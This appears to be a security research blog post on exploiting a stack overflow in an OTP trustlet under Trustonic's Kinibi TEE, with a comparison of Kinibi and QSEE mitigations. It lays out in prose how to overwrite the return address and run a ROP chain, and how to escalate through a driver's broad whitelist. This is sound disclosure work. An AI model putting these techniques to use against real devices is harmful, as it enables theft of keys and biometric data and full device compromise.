The issue we’re going to exploit is a simple stack-overflow. You might rightly assume that a stack overflow would be mitigated against by modern exploit mitigations. However, looking at the binary it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack alignment using which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execution-function” primitive.
Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server.Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.ASLR Kinibi offers no form of ASLR. In fact, all trustlets are loaded into a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, gadgets that invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped into a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, this means that any vulnerability found within a trustlet running under Trustonic’s TEE can therefore be exploited without requiring prior information about the address-space of the trustlet (thus lowering the bar for remotely exploitable bugs).
So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB in size. Since, as we’ve noted before, QSEE trustlets VAS consists of a flat mapping, this means that the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high entropy ASLR), the ASLR enabled by QSEE is limited approximately 9 bits (therefore with 355 guesses, an attacker would have a 50% chance of correctly guessing the base address). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack from the trustlet’s data segment, without providing any guard page inbetween. Furthermore, the stack is located at the end of the data segments, and global data structures are placed before it. This layout makes it ideal for an attacker to either overflow the stack into the globals, or vice-versa.
Identically, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, overflows in any of these data structures can be used to target any of the others.

TEEs As A High Value Target
At this point, it is probably clear enough that compromising TEEs on Android seems like a relatively straightforward task. Since both TEEs lag behind in term of exploit mitigations, it appears that the bar for exploitability of vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the number of trusted applications on the Galaxy S8, we can see that it contains no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver provides APIs to both read and write physical memory - a capability which is normally reserved for drivers alone.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever increasing number of trustlets result in a dangerous expansion of the TCB. This fact, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, make TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.

Categories: Security